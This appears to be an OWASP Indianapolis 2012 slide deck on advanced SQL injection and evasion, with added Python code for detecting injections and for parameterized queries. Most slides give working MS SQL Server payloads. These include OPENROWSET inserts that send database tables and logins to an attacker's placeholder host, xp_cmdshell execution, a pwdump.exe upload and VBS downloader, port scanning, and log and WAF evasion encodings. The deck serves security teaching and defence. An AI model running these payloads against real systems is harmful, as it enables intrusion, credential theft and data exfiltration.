Owasp Indy Q2 2012 Advanced SQLi


Advanced SQLi and Evasion Techniques

About Me

Introduction
Damian Profancik | Technical Lead/Security Services Leader @ Apparatus, CISSP
dprofancik@gmail.com
@integrisec

Credit
Cesar Cerrudo – CTO, IOActive Labs
o http://www.appsecinc.com/presentations/Manipulating_SQL_Server_Using_SQL_Injection.pdf
ModSecurity Team – Trustwave SpiderLabs
o http://blog.spiderlabs.com/2011/07/modsecurity-sql-injection-challenge-lessons-learned.html
Avi Douglen – OWASP Board Member, Israel
o http://www.comsecglobal.com/framework/Upload/SQL_Smuggling.pdf

SQL Injection Basics
• Dynamic construction of SQL queries

"SELECT * FROM table WHERE user = '" + uname + "' AND pwd = '" + pword + "'"

• Unsanitized user input

uname = ' or 1=1-- => SELECT * FROM table WHERE user = '' or 1=1-- ' AND pwd = ''

• Excessive permissions
o Web services running as a privileged user with db_owner rights
o Connecting to the database using sa, dbo, or sysadmin accounts
o Lax file system permissions

Advanced SQLi Techniques
• Blind SQL Injection
• Data Exfiltration
• Privilege Escalation
• Command Execution
• Uploading Files
• Internal DB Server Exploration
• Port Scanning
• Firewall Evasion
• Log Evasion
• WAF Evasion

Blind SQL Injection

Blind SQL Injection
• Differential Analysis

Example:

http://www.someforum.com/posts.php?id=2

SELECT author, title, body FROM posts WHERE ID = 2

http://www.someforum.com/posts.php?id=2 and 1=2

SELECT author, title, body FROM posts WHERE ID = 2 and 1=2

http://www.someforum.com/posts.php?id=2 and 1=1

SELECT author, title, body FROM posts WHERE ID = 2 and 1=1

Blind SQL Injection (cont.)
• Database Management System Fingerprinting

o System Functions
• MS SQL Server = getdate()
• MySQL = now()
• Oracle = sysdate()
• Example: http://www.someforum.com/posts.php?id=2 and getdate()=getdate()

o String Concatenation
• MS SQL Server = +
• MySQL = +, CONCAT()
• Oracle = ||, CONCAT()
• Example: http://www.someforum.com/posts.php?id=2 and 'test'='te'+'st'

o Query Chaining
• MS SQL Server, MySQL = allow chaining with a semicolon
• Oracle = does NOT allow chaining with a semicolon
• Example: http://www.someforum.com/posts.php?id=2; commit --

Blind SQL Injection (cont.)
• Timing Attacks

o Adding delay
• SQL Server = WAITFOR DELAY '0:0:10'
• MySQL = BENCHMARK(10000000,ENCODE('MSG','by 10 seconds'))
• PostgreSQL = pg_sleep(10)
• Oracle = UNION with a query that returns a lot of results

o SELECT IF(condition, true, false)

Example:

…1 UNION SELECT IF(SUBSTRING(password,1,1) = CHAR(50),BENCHMARK(10000000,ENCODE('MSG','by 10 seconds')),null) FROM users WHERE userid = 1;

Attacking MS SQL Server

Linked and Remote Servers
• OPENROWSET

Example:

SELECT * FROM OPENROWSET('SQLOLEDB',
  'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
  'SELECT * FROM table')

• OPENDATASOURCE

Example:

SELECT * FROM OPENDATASOURCE('SQLOLEDB',
  'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;').DatabaseName.dbo.TableName

Data Exfiltration
• Remote server INSERT

Example:

INSERT INTO OPENROWSET('SQLOLEDB',
  'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
  'SELECT * FROM table1')
SELECT * FROM table2

Data Exfiltration (cont.)

INSERT INTO OPENROWSET('SQLOLEDB',
  'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
  'SELECT * FROM _sysdatabases')
SELECT * FROM master.dbo.sysdatabases

INSERT INTO OPENROWSET('SQLOLEDB',
  'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
  'SELECT * FROM _sysobjects')
SELECT * FROM databasename.dbo.sysobjects

INSERT INTO OPENROWSET('SQLOLEDB',
  'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
  'SELECT * FROM _syscolumns')
SELECT * FROM databasename.dbo.syscolumns

Data Exfiltration (cont.)

INSERT INTO OPENROWSET('SQLOLEDB',
  'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
  'SELECT * FROM table1')
SELECT * FROM databasename..table1

INSERT INTO OPENROWSET('SQLOLEDB',
  'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
  'SELECT * FROM table2')
SELECT * FROM databasename..table2

INSERT INTO OPENROWSET('SQLOLEDB',
  'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
  'SELECT * FROM _sysxlogins')
SELECT * FROM databasename.dbo.sysxlogins

Privilege Escalation
• Known vulnerabilities

Example:

SQL injection vulnerability in the RESTORE DATABASE command that can lead to privilege escalation

Team SHATTER - 4/12/2012 - http://packetstormsecurity.org/files/111788/shatter-sqlserver.txt

• Often not required
o Connection strings using SA, dbo, sysadmin
o Web service context

Command Execution

Example:

INSERT INTO OPENROWSET('SQLOLEDB',
  'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
  'SELECT * FROM temp_table')
EXEC master.dbo.xp_cmdshell 'dir'

Uploading Files
On attacker's server…

1. CREATE TABLE AttackerTable (data text)

2. BULK INSERT AttackerTable FROM 'pwdump.exe' WITH (codepage='RAW')

On victim's server…

3. EXEC xp_cmdshell 'bcp "SELECT * FROM AttackerTable" queryout pwdump.exe -c -Craw -SAttackersIP -Usa -Ppwn3d'

4. EXEC xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\MSSQLServer\Client\ConnectTo','AttackersAlias','REG_SZ','DBMSSOCN,AttackersIP,80'

5. EXEC xp_cmdshell 'bcp "SELECT * FROM AttackerTable" queryout pwdump.exe -c -Craw -SAttackersAlias -Usa -Ppwn3d'

Uploading Files (cont.)

INSERT INTO OPENROWSET('SQLOLEDB',
  'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
  'SELECT * FROM temp_table')
EXEC xp_cmdshell '"first script line" >> script.vbs'
EXEC xp_cmdshell '"second script line" >> script.vbs'
...
EXEC xp_cmdshell '"last script line" >> script.vbs'
EXEC xp_cmdshell 'script.vbs' ==> execute the script to download the binary

Internal DB Server Exploration
• Linked and Remote Servers

1. INSERT INTO OPENROWSET('SQLOLEDB',
     'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
     'SELECT * FROM _sysservers')
   SELECT * FROM master.dbo.sysservers

2. INSERT INTO OPENROWSET('SQLOLEDB',
     'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
     'SELECT * FROM _sysservers')
   SELECT * FROM linkedserver1.master.dbo.sysservers

3. INSERT INTO OPENROWSET('SQLOLEDB',
     'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
     'SELECT * FROM _sysdatabases')
   SELECT * FROM linkedserver1.master.dbo.sysdatabases

4. Rinse and repeat…

Port Scanning

Example:

SELECT * FROM OPENROWSET('SQLOLEDB',
  'uid=sa;pwd=;Network=DBMSSOCN;Address=192.168.1.1,80;timeout=5',
  'SELECT * FROM table')

Evasion Techniques

Firewall Evasion
• Use port 80 for outbound

Example:

INSERT INTO OPENROWSET('SQLOLEDB',
  'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,80;',
  'SELECT * FROM table1')
SELECT * FROM table2

Log Evasion
• Inject using POST parameters

• Long HTTP requests
o IIS truncates requests longer than 4097 characters
o Sun-One Application Server truncates at 4092 characters

Example:

http://www.someforum.com/posts.php?param=<4097 x 'a'>&id=2 or 1=1--

WAF Evasion
• Comments

o # = single line comment
o -- = single line comment
o /* */ = inline, multi-line comment
o /*! */ = MySQL-specific inline, multi-line comment

Example:

http://www.someforum.com/posts.php?id=2 UN/**/ION SEL/**/ECT * FROM…

• New line
o %0D%0A = URL-encoded newline
o %0B = URL-encoded vertical separator

Example:

http://www.someforum.com/posts.php?id=2 UNION%0D%0ASELECT * FROM…

WAF Evasion (cont.)
• Character Encoding

o Unicode (U+02BC = ʼ)
o CHAR()
o Hexadecimal
o URL-encoding
o Double Encoding

Example:

Double Encoding:

URL = http://www.someforum.com/posts.php?id=2 UN%252f%252a%252a%252fION SEL%252f%252a%252a%252fECT * FROM…

WAF = http://www.someforum.com/posts.php?id=2 UN%2f%2a%2a%2fION SEL%2f%2a%2a%2fECT * FROM…

Result = http://www.someforum.com/posts.php?id=2 UN/**/ION SEL/**/ECT * FROM…

WAF Evasion (cont.)
• Concatenation

o EXEC()
o Split/Join
o Special Characters (i.e. '[', '+', '%', etc.)

Example:

Split/Join:

URL = http://www.someforum.com/posts.php?id=SELECT name&id=password FROM users
WAF = id=SELECT name
      id=password FROM users
ASP/ASP.Net = id=SELECT name,password FROM users

Special Characters:

URL = http://www.someforum.com/posts.php?id=SEL%ECT name,password FR%OM users
WAF = id=SEL%ECT name,password FR%OM users
ASP/ASP.Net = id=SELECT name,password FROM users
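The WAF and log evasions on the preceding slides all rely on the filter seeing a different string than the database does. The detection logic below, written for this page and not part of the original deck, normalizes a request the way the back end would (repeated URL decoding, inline-comment removal, newline folding, ASP-style joining of repeated parameters) before matching, and also flags values long enough to push an injection past the truncation limits named above. The sample URLs are constructed and use the deck's placeholder host.

```python
import re
from urllib.parse import parse_qs, urlsplit, unquote

# Inline comments listed in the deck: /* ... */ and MySQL's /*! ... */
INLINE_COMMENT_RE = re.compile(r"/\*!?.*?\*/", re.S)
UNION_SELECT_RE = re.compile(r"\bunion\b(?:\s+all)?\s+select\b")
SELECT_FROM_RE = re.compile(r"\bselect\b.+\bfrom\b")
TAUTOLOGY_RE = re.compile(r"\b(?:or|and)\s+(\d+)\s*=\s*\1\b")   # or 1=1
MAX_VALUE_LEN = 4000   # below the 4097 (IIS) / 4092 (Sun-One) truncation limits


def full_decode(value: str, max_rounds: int = 5) -> str:
    """URL-decode until the text stops changing, so double encoding is undone."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def normalize(value: str) -> str:
    """Decode, drop inline comments and fold CR/LF/VT runs into one space."""
    text = INLINE_COMMENT_RE.sub("", full_decode(value))   # UN/**/ION -> UNION
    text = re.sub(r"[\r\n\x0b\t ]+", " ", text)            # UNION\r\nSELECT -> UNION SELECT
    return text.strip().lower()


def analyze_request(url: str) -> list:
    """Return tags for one request URL; an empty list means nothing was flagged."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    tags = []
    for name, values in params.items():
        if len(values) > 1:
            tags.append(f"{name}:repeated-param")   # split/join across duplicates
        if any(len(v) > MAX_VALUE_LEN for v in values):
            tags.append(f"{name}:oversized-value")  # padding to push past log limits
        # Inspect the value as ASP/ASP.NET hands it to the query: duplicates joined by comma.
        text = normalize(",".join(values))
        if UNION_SELECT_RE.search(text):
            tags.append(f"{name}:union-select")
        elif SELECT_FROM_RE.search(text):
            tags.append(f"{name}:select-from")
        if TAUTOLOGY_RE.search(text):
            tags.append(f"{name}:tautology")
    return tags


if __name__ == "__main__":
    # Constructed sample requests modelled on the deck's examples (placeholder host).
    for url in ["http://www.someforum.com/posts.php?id=2",
                "http://www.someforum.com/posts.php?id=2%20UN%252f%252a%252a%252fION%20SEL%252f%252a%252a%252fECT%20*%20FROM%20users",
                "http://www.someforum.com/posts.php?id=SELECT%20name&id=password%20FROM%20users"]:
        print(analyze_request(url) or "clean", "<-", url[:70])
```

Matching on the normalized text rather than the raw request is the point: a rule that looks for the literal token UNION SELECT in the raw URL misses every variant on these slides.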

SQL Injection Prevention

SQLi Prevention
• Sanitize User Input

o Normalize Input
o Whitelists
o Built-in Functions
o Regular Expressions
o Trust NO data source (i.e. Cookies, Referer, User-Agent, etc.)

• Prepared Statements/Parameterized Queries
• Stored Procedures
• Accounts with Least Privilege
• Enable DisallowAdhocAccess registry setting for MS SQL Server
• Perform Self Assessments
• Use a Web Application Firewall
• Filter Outbound Traffic at Firewall
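To make the first two prevention items concrete, here is the login query from the SQL Injection Basics slide built both ways, as an added example that is not from the deck: the concatenated form lets the uname = ' or 1=1-- input from that slide match every row, while the parameterized form binds the same input as a literal value and matches nothing. A whitelist normalizer for the posts.php id parameter follows. It uses an in-memory SQLite database with constructed rows; the table layout and the `?` placeholder style are assumptions for this example, and the same shape applies to any driver that binds parameters.

```python
import re
import sqlite3
from typing import Optional

# Constructed sample data: an in-memory database with two placeholder users.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (user TEXT, pwd TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'correct horse'), ('bob', 'hunter2')")


def login_concat(uname: str, pword: str) -> int:
    """The deck's dynamically built query (vulnerable form); returns matched rows."""
    sql = "SELECT * FROM users WHERE user = '" + uname + "' AND pwd = '" + pword + "'"
    return len(conn.execute(sql).fetchall())


def login_param(uname: str, pword: str) -> int:
    """Same query as a parameterized statement: input is bound, never parsed as SQL."""
    sql = "SELECT * FROM users WHERE user = ? AND pwd = ?"
    return len(conn.execute(sql, (uname, pword)).fetchall())


ID_RE = re.compile(r"[1-9][0-9]{0,8}")   # whitelist: a plain positive integer only


def normalize_post_id(raw: str) -> Optional[int]:
    """Whitelist-normalize posts.php?id=; anything but a bare integer is rejected (None)."""
    if raw is None or not ID_RE.fullmatch(raw.strip()):
        return None
    return int(raw)


def fetch_post(raw_id: str) -> Optional[list]:
    """Validate the id first, then bind it; 'id=2 and 1=1' never reaches the database."""
    post_id = normalize_post_id(raw_id)
    if post_id is None:
        return None
    return conn.execute("SELECT ? AS id", (post_id,)).fetchall()


if __name__ == "__main__":
    payload = "' or 1=1--"
    print("concatenated:", login_concat(payload, ""), "rows")   # every user matches
    print("parameterized:", login_param(payload, ""), "rows")   # no user matches
    print("id=2 and 1=1 ->", normalize_post_id("2 and 1=1"))    # rejected
```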

Q & A